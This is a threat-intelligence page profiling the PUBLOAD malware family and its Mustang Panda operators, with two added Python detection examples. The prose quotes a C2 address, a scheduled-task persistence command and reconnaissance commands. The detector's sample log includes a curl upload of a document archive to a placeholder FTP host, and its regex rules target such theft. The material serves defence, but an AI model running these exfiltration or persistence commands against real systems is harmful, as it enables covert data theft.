PUBLOAD
PUBLOAD is a downloader/stager malware family associated with the China-linked threat actor Mustang Panda, also tracked as Stately Taurus, Earth Preta and Hive0154; some reporting also ties its use to the cluster tracked as UNK_SteadySplit. It has been linked to Mustang Panda activity since at least early 2022 and has been used in cyber-espionage campaigns targeting government entities in the Asia-Pacific region, ASEAN-affiliated organizations, a Southeast Asian government, and members of the Tibetan community. PUBLOAD has been used to deliver additional payloads, including PlugX, and reporting also describes it as a conduit for other Mustang Panda tooling such as FDMTP and PTSOCKET.
Observed delivery and execution methods include spear-phishing emails, ZIP archives containing lure executables, DLL side-loading through legitimate executables, and propagation via infected removable drives through the HIUPAN/USBFect worm. In one reported chain, a ZIP containing Talking_Points_for_China.exe loaded KeyScramblerIE.dll and ultimately deployed PUBLOAD. In another, a malicious DLL identified as BrMod104.dll was described as part of the PUBLOAD family. PUBLOAD has also abused legitimate signed binaries and valid digital signatures/certificates to evade detection.
Functionally, PUBLOAD communicates with command-and-control infrastructure for further instructions and can download shellcode payloads via HTTP POST requests. Variants have used either HTTP or TCP for C2. Reported C2 traffic has masqueraded as Microsoft Windows update traffic, and one observed campaign attempted communications with www.openservername.com at 146.70.149.36. A TCP-based variant was reported to transmit host data using obfuscated TLS-like headers, while another used fake TLS headers after XOR-based encryption.
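The fake-TLS framing described above gives a defender something concrete to check in network telemetry. The following is an added example, not code from this page or from any vendor report: a small Python checker that parses TLS record headers from a captured client flight and flags framing that a real TLS client would never produce. Its session-level heuristic assumes only that a genuine session opens with a handshake record carrying a ClientHello; the XOR'd sample bytes, key and field layout are constructed for the example and are not PUBLOAD's real encoding.

```python
"""Heuristic sanity checks for TLS record framing (added example, not PUBLOAD's real scheme)."""
from __future__ import annotations
import struct

CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake", 23: "application_data"}
# Handshake message types (RFC 5246 / RFC 8446) that may legitimately open a handshake record.
HANDSHAKE_TYPES = {0, 1, 2, 4, 8, 11, 12, 13, 14, 15, 16, 20}
MAX_FRAGMENT = 16384 + 2048  # TLS 1.2 upper bound for a compressed, encrypted fragment


def parse_records(stream: bytes) -> list[tuple[int, int, bytes]]:
    """Split a byte stream into (content_type, version, payload) records; raise on bad framing."""
    records = []
    off = 0
    while off < len(stream):
        if len(stream) - off < 5:
            raise ValueError(f"truncated record header at offset {off}")
        ctype, version, length = struct.unpack("!BHH", stream[off:off + 5])
        payload = stream[off + 5:off + 5 + length]
        if len(payload) != length:
            raise ValueError(f"record at offset {off} claims {length} bytes, {len(payload)} present")
        records.append((ctype, version, payload))
        off += 5 + length
    return records


def check_tls_stream(stream: bytes) -> list[str]:
    """Return a list of anomaly strings; an empty list means the framing looks like real TLS."""
    try:
        records = parse_records(stream)
    except ValueError as exc:
        return [f"framing: {exc}"]
    findings = []
    for i, (ctype, version, payload) in enumerate(records):
        if ctype not in CONTENT_TYPES:
            findings.append(f"record {i}: unknown content type {ctype:#04x}")
        if (version >> 8) != 3 or (version & 0xFF) > 4:
            findings.append(f"record {i}: implausible record version {version:#06x}")
        if len(payload) > MAX_FRAGMENT:
            findings.append(f"record {i}: fragment of {len(payload)} bytes exceeds the TLS maximum")
        if ctype == 22:
            if len(payload) < 4:
                findings.append(f"record {i}: handshake record too short for a message header")
                continue
            htype = payload[0]
            if htype not in HANDSHAKE_TYPES:
                findings.append(f"record {i}: unknown handshake type {htype:#04x}")
            # A ClientHello carries its legacy client version right after the 4-byte header.
            if htype == 1 and (len(payload) < 6 or payload[4] != 3):
                findings.append(f"record {i}: ClientHello without a 3.x client version")
    # Heuristic (assumption): a real client flight opens with a ClientHello. Application-data
    # records with no preceding handshake are the typical shape of "fake TLS" C2 framing.
    if records and not (records[0][0] == 22 and records[0][2][:1] == b"\x01"):
        findings.append("session: first record is not a ClientHello (application data with no handshake)")
    return findings


def build_client_hello_record() -> bytes:
    """Construct a minimal but well-formed TLS 1.2-style ClientHello record (sample input)."""
    body = (b"\x03\x03" + bytes(32)      # client_version, random (zeroed for the sample)
            + b"\x00"                    # session_id length 0
            + b"\x00\x02\x13\x01"        # one cipher suite (0x1301)
            + b"\x01\x00"                # one compression method: null
            + b"\x00\x00")               # no extensions
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def build_fake_tls_sample(key: int = 0x5A) -> bytes:
    """Construct a 'fake TLS' beacon: an application_data header wrapped around XOR'd host data.
    Plaintext, key and layout are invented for this example, not taken from a real sample."""
    plaintext = b"HOST=WS-FIN-07;USER=alice;TICKS=1234567"
    inner = bytes(b ^ key for b in plaintext)
    return b"\x17\x03\x03" + len(inner).to_bytes(2, "big") + inner
```

Run over the first client-to-server bytes of a flow: a real handshake yields no findings, the constructed beacon trips the session heuristic, and a header whose length field does not match the bytes on the wire fails framing outright. Because a raw record parser sees only framing, pair it with the Windows-update masquerade described above (HTTP traffic whose Host and path claim to be update traffic but whose destination is not Microsoft infrastructure) rather than relying on either signal alone.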
Reported host capabilities include reconnaissance and system discovery, including gathering running services with tasklist, querying registry keys to collect software version information, and identifying internet connectivity details using commands such as tracert -h 5 -4 google.com and curl http://myip.ipip.net. PUBLOAD has also been reported to collect and exfiltrate system information including volume details, computer names, usernames, and system tick counts. Additional reporting states it can harvest files with extensions such as .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx, compress targeted document files into RAR archives, and exfiltrate those archives to an adversary-controlled FTP site using curl.
For persistence, PUBLOAD has created scheduled tasks, including use of schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 ..., and reporting also notes persistence via Windows registry autorun keys in some infection chains. Overall, the malware is consistently described as part of Mustang Panda espionage operations focused on persistence, payload delivery, lateral spread via USB infection, reconnaissance, and data theft/exfiltration.
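The host-side behaviours in the three paragraphs above (tasklist and registry discovery, the tracert and curl connectivity probes, RAR archiving of documents, curl uploads to FTP, and a scheduled task firing every minute) are each individually noisy but rare in combination. The following added example, written for this page rather than taken from any vendor detection content, correlates those behaviours per host over constructed process-creation events. The log format, hostnames, user names, file paths and the FTP destination placeholder are all invented; the scheduled-task command line reproduces only the flags the page quotes.

```python
"""Correlate PUBLOAD-like host behaviours across process-creation events (added example)."""
from __future__ import annotations
import re
from collections import defaultdict
from typing import Callable, Dict, List, NamedTuple


class Event(NamedTuple):
    ts: str
    host: str
    user: str
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    """Parse one 'ts|host|user|image|cmdline' line (a constructed format, not a vendor schema)."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed event line: {line!r}")
    return Event(*parts)


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


def is_minute_interval_task(cl: str) -> bool:
    """schtasks creating a task that fires every 1-5 minutes; the page quotes /sc minute /MO 1."""
    return (_has(r"\bschtasks(\.exe)?\b", cl) and _has(r"/create\b", cl)
            and _has(r"/sc\s+minute\b", cl) and _has(r"/mo\s+[1-5]\b", cl))


# Each rule is deliberately narrow; the correlation step below supplies the confidence.
RULES: Dict[str, Callable[[str], bool]] = {
    "schtasks_minute_interval": is_minute_interval_task,
    "tracert_connectivity_probe": lambda cl: _has(r"\btracert(\.exe)?\s+-h\s+\d+\s+-4\b", cl),
    "curl_external_ip_lookup": lambda cl: _has(r"\bcurl(\.exe)?\b.*\bmyip\.ipip\.net\b", cl),
    "curl_ftp_upload": lambda cl: _has(r"\bcurl(\.exe)?\b.*\bftp://", cl),
    "rar_document_archive": lambda cl: _has(r"\brar(\.exe)?\s+a\b.*\.(docx?|xlsx?|pptx?|pdf)\b", cl),
}


def match_rules(events: List[Event]) -> Dict[str, set]:
    """Map each host to the set of rule names its command lines triggered."""
    hits: Dict[str, set] = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev.cmdline):
                hits[ev.host].add(name)
    return dict(hits)


def correlate(events: List[Event], min_distinct: int = 2) -> Dict[str, List[str]]:
    """Hosts showing at least `min_distinct` different behaviours; a single hit stays below threshold."""
    return {h: sorted(names) for h, names in match_rules(events).items() if len(names) >= min_distinct}


# Constructed sample telemetry: one host showing the chain, one host with benign look-alikes.
SAMPLE_LOG = """\
2024-03-05T09:14:02Z|WS-FIN-07|alice|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR "C:\\Users\\Public\\Libraries\\PLACEHOLDER_loader.exe"
2024-03-05T09:14:40Z|WS-FIN-07|alice|C:\\Windows\\System32\\tasklist.exe|tasklist /svc
2024-03-05T09:14:41Z|WS-FIN-07|alice|C:\\Windows\\System32\\TRACERT.EXE|tracert -h 5 -4 google.com
2024-03-05T09:14:45Z|WS-FIN-07|alice|C:\\Windows\\System32\\curl.exe|curl http://myip.ipip.net
2024-03-05T09:21:10Z|WS-FIN-07|alice|C:\\Users\\Public\\rar.exe|rar.exe a -r C:\\Users\\Public\\docs.rar C:\\Users\\alice\\Documents\\*.docx C:\\Users\\alice\\Documents\\*.pdf
2024-03-05T09:22:03Z|WS-FIN-07|alice|C:\\Windows\\System32\\curl.exe|curl -T C:\\Users\\Public\\docs.rar ftp://EXFIL-HOST-PLACEHOLDER/upload/
2024-03-05T10:02:00Z|WS-HR-03|bob|C:\\Windows\\System32\\schtasks.exe|schtasks /Create /TN Backup /sc daily /st 02:00 /TR backup.bat
2024-03-05T10:05:12Z|WS-HR-03|bob|C:\\Windows\\System32\\curl.exe|curl -sS https://updates.example.com/manifest.json
2024-03-05T10:06:30Z|WS-HR-03|bob|C:\\Windows\\System32\\tasklist.exe|tasklist
"""


def analyse(raw: str = SAMPLE_LOG) -> Dict[str, List[str]]:
    events = [parse_event(line) for line in raw.splitlines() if line.strip()]
    return correlate(events)


if __name__ == "__main__":
    for host, names in analyse().items():
        print(f"{host}: {', '.join(names)}")
```

The benign host trips none of the rules even though it runs schtasks, curl and tasklist, while the compromised host accumulates five distinct behaviours. In a real pipeline the same rule table applies to Sysmon event 1 or Windows 4688 command lines, and the per-host window should be bounded (the sample spans under ten minutes) so that unrelated admin activity weeks apart does not accumulate into an alert.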
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Typical attack chains involve the use of spear-phishing emails to drop malware families like PUBLOAD or TONESHELL. PUBLOAD, which also functions similarly to TONESHELL, is also capable of downloading shellcode payloads via HTTP POST requests from a command-and-control (C2) server.
UNK_SteadySplit is a user of the custom TONESHELL and PUBLOAD malware families, alongside multiple other first-stage malware families delivered in phishing campaigns.
Techniques & procedures
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.
Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.
Typical attack chains involve the use of spear-phishing emails to drop malware families like PUBLOAD or TONESHELL.
"Pubload Backdoor Delivered via Phishing Lures"
Execution
7 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
facilitate two active reverse shells in parallel... Yokai, a backdoor that sets up a reverse shell to execute arbitrary commands.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
"BOOKWORM ... execution on the heap is initiated through callback function of legitimate API functions such as EnumChildWindows or EnumSystemLanguageGroupsA"; "CLAIMLOADER ... run its shellcode through the callback function"; "PUBLOAD stager leveraged Windows API functions with callback ... to bypass anti-virus monitoring"
"...a malicious archive with a document-spoofing executable, which launches the Claimloader DLL..."
This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.
Persistence
3 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Privilege Escalation
3 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Stealth
6 techniques
The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Akira has used legitimate names and locations for files to evade defenses.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
The malware copies its components to a working directory... These components include: A legitimate parent process ClaimLoader itself
This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.
Defense Impairment
1 technique
The content repeatedly describes threat actors and malware using valid, stolen, forged, self-signed, or abused code-signing certificates to sign malware and appear legitimate, including examples such as AppleJeus using a valid digital signature from Sectigo, APT41 leveraging code-signing certificates, FIN7 signing Carbanak payloads, and SUNBURST being digitally signed by SolarWinds.
Discovery
5 techniques
"actors used the following command ... to obtain information about services: net start"; "APT1 used the commands net start and tasklist to get a listing of the services on the system"; "OilRig has used sc query on a victim to gather information about services"; "Indrik Spider has used the win32_service WMI class to retrieve a list of services"
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
Multiple malware families (e.g., Avaddon, Bazar, Clop, Ryuk, REvil, LockBit, Zeus Panda) check OS language/keyboard layout/locale and terminate or alter execution if the system matches excluded languages (commonly Russian/CIS) or does not match desired target languages (e.g., Spanish/Portuguese, Arabic, Persian).
Lateral Movement
2 techniques
Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.
USBFect is a worm that spreads via removable media, often used to propagate PUBLOAD for lateral movement.
Collection
2 techniques
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx) ... PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.
The captured information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP site via cURL.
Command and Control
3 techniques
Variants of PUBLOAD use either HTTP or TCP for command-and-control (C2) communications. The sample we observed is a variant that uses TCP... Masol RAT... communicates with its C2 servers over HTTP POST... This malware uses Google Remote Procedure Call (gRPC) for C2 communication.
This payload is part of the PubLoad malware family, which functions as stager malware that communicates with its command-and-control (C2) server for further instructions. The C2 communication is facilitated through HTTP requests that attempt to masquerade as legitimate traffic associated with Microsoft Windows updates.
its primary responsibility is to download next-stage payloads on the infected host... PUBLOAD... is also capable of downloading shellcode payloads via HTTP POST requests from a command-and-control (C2) server.
Exfiltration
2 techniques
PUBLOAD collected and exfiltrated critical system information... over TCP with obfuscated TLS-like headers
The captured information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-thread mode.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
39 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as part of Mustang Panda's evolving malware/tooling ecosystem.
A named malware/tool repeatedly deployed by the Mustang Panda cluster in recent attacks.
Malware used in the campaign and propagated by USBFect via infected USB drives to support lateral movement and data exfiltration.
Malware used by Stately Taurus/Mustang Panda, propagated via infected USB drives. It collected and exfiltrated system information over TCP using obfuscated TLS-like headers and supported persistent access.